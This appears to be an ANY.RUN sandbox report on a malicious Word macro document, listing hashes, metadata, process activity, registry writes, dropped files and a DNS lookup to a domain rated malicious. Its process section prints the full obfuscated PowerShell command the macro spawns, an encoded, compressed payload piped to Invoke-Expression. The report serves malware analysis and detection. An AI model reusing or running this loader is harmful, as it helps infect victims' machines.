analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

a088f745242b8249917993945089ba36d426ee597d803b1824dc9b3d30e2c064

Full analysis: https://app.any.run/tasks/8048917d-0e7e-4e37-b77f-dd4d0bc7a6d5
Verdict: Malicious activity
Analysis date: July 11, 2019, 18:31:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: cpjbhtiycbv, Subject: jojxdlzfhywl, Comments: notvcbcbjdajgyxytmqabeqpac, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 25 22:21:00 2018, Last Saved Time/Date: Thu Jul 4 04:22:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

860C7E42621B4BDBC96E376848B3DB1B

SHA1:

42E79D2120E84DF854DBA7549027D704471AF0A0

SHA256:

A088F745242B8249917993945089BA36D426EE597D803B1824DC9B3D30E2C064

SSDEEP:

1536:cajjRgtFxaJp9m+x5m+AeS6U47taYyXpMxS:jjjRgNa9m+RSSB1qpMxS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3716)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 3716)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3132)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3716)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3716)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
TitleOfParts:
  • cpjbhtiycbv
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Bytes: 22528
Company: -
Manager: -
CodePage: Windows Cyrillic
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2019:07:04 03:22:00
CreateDate: 2018:04:25 21:21:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal
Comments: notvcbcbjdajgyxytmqabeqpac
Keywords: -
Author: -
Subject: jojxdlzfhywl
Title: cpjbhtiycbv
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3716"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\a088f745242b8249917993945089ba36d426ee597d803b1824dc9b3d30e2c064.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3132"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enco IAAoACAALgAoACcATgBFAFcAJwArACcALQBvAGIAJwArACcASgAnACsAJwBFAGMAVAAnACkAIAAgAFMAWQBTAHQARQBNAGAALgBpAG8AYAAuAGMATwBtAFAAcgBgAEUAYABzAFMAaQBPAGAATgAuAGQARQBgAEYAbABhAFQAZQBgAFMAdAByAGUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoAZgBSAG8AbQBCAEEAcwBlADYANABzAFQAUgBpAG4ARwAoACcAUgBZAC8AQgBUAG8ATgBBAEcASQBUAHYASgByADcARABIAGoAQQBMAHcAUwA1AEoASgBiAEYAQwBpAE4ARgBTAEcAeABKAEQAbQAwAHIAcgBRAFUAMABLADYAMAA5AFoAbwBlAHoASwBiAGsAcwBwADQAZAAzAGwAVQBOAHYATAB6AEcAVgBtADgAbwAzAEcAVgBuAHgAMAAvADcAeABEAEgAcwBLAGkAWABzAGsAOABvAFEAVgAyAHQAUwBtAGQATABhAFAANAB4AGQATwBnADMARABzADcAQwBaAFcAbwBlAE0AbwBLAE0AUABFAG4ATgByAFYAVAB4ADgAUQBFAEQAdABDAG4AdQBaADAAKwBMAEwAOAA5AG8AdQBNAFMAbQB4AGoAcQBBAGUAOAB0ACsAUQBHAHEAcwBJAEYAQwBXAEUAZAByAFUAawBPAHkASAByADgAeQBDAEMATgBYADIAKwA4AFcALwB1AHoAcABPAFAAWgB3AHAAcABSAHcATABDAHQATAA0AGsAcgB4AE0AcQA4AFoATgBPAFQAUQBIAEMAMQBXAC8AMQBxADEAawBEAGsAUgBtAFgAZwBzAHYASQB4AHYAaAB5AFMAWABtAEUAaABSAE0ASwBYAGoARwAyAHkANABLAGEAOABnAHAAcABtAHUAQgBYAE8AeAB0AFUAUAAyAGoAbABpAEoAegB0AE4ARwBxADYAcQBtAFAAWQBFAFIAbgA5AGQAaAB3AFcATQAvAEQAWQByAEoAcABYAEMATAAvAG0AOABhAGIAcABBAGkAWABlAC8ANQBwADYAQQBHAFEAUQArAHYAbwBKAGQAdABUADMAKwBPAGsARwBJAFMAVABsAFcARwBCAGgAdABBAFEALwB0AHUAWgBCAHUAbwAvAGYAQgBaAHYAQwBtADUAVgBJAHgASwBNAHEAOAA0AEIAUwBtAC8ASABPAGMAdABpAGgAZABLAHYANAB3AG4AUABXAG4AdQBkAGgAMgBOAEYAYwAzAGEAcgByAHUAKwArAGcATQA9ACcAKQAgACwAWwBzAFkAcwBUAGUAbQAuAGkAbwAuAGMATwBNAHAAUgBlAFMAcwBpAE8ATgAuAEMAbwBtAHAAcgBFAFMAUwBJAE8ATgBtAE8AZABlAF0AOgA6AEQARQBDAG8AbQBwAHIAZQBTAFMAIAApAHwAJgAoACcAZgAnACsAJwBvAHIAZQAnACsAJwBhAGMASAAnACkAewAgACYAKAAnAE4ARQBXAC0AbwBiACcAKwAnAEoAJwArACcARQBjAFQAJwApACAAIABpAGAAbwAuAGAAUwBgAFQAcgBlAGEAbQBSAGUAYQBkAGUAUgAoACQAXwAsAFsAcwB5AFMAVABlAG0ALgBUAEUAeABUAC4ARQBOAGMAbwBkAEkAbgBHAF0AOgA6AGEAcwBDAGkAaQApACAAfQB8AC4AKAAnAEYAbwByAEUAYQAnACsAJwBDACcAKwAnAEgAJwApAHsAJABfAC4AcgBlAGEARAB0AG8AZQBOAGQAKAApACAAfQAgACkAIAB8AC4AKAAnAEkAJwArACcAZQB4ACcAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 381
Read events
918
Write events
458
Delete events
5

Modification events

(PID) Process:(3716) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:qs$
Value:
71732400840E0000010000000000000000000000
(PID) Process:(3716) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3716) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3716) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1324023838
(PID) Process:(3716) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1324023952
(PID) Process:(3716) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1324023953
(PID) Process:(3716) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
840E00009A2DFCD91638D50100000000
(PID) Process:(3716) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:jt$
Value:
6A742400840E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3716) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:jt$
Value:
6A742400840E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3716) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
3716WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6B51.tmp.cvr
MD5:
SHA256:
3132powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UUSED6Z8MWD0SDCLYFDP.temp
MD5:
SHA256:
3132powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB
SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95
3716WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:2B750E90A4B89E831E6358713AF21201
SHA256:5882D6220148A5C0346CEF118FB2CC2F175422E3E7BDBF8AA0D90BD1856FAF22
3716WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$88f745242b8249917993945089ba36d426ee597d803b1824dc9b3d30e2c064.docpgc
MD5:EDCE3B19BF70A35DB3868891CB4C3750
SHA256:91644194A40B9730CC2A4882E819D202372D625B8E650540278FE4B79BBCE860
3716WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:51DA5FE52031A97E3360B3BD197C6843
SHA256:71A69D103A520831A9EAB13321EEEB6B2DA848479DE7A6DF34B4A63436E20611
3132powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16743a.TMPbinary
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB
SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
hbartonkwiey.xyz
malicious

Threats

No threats detected
No debug info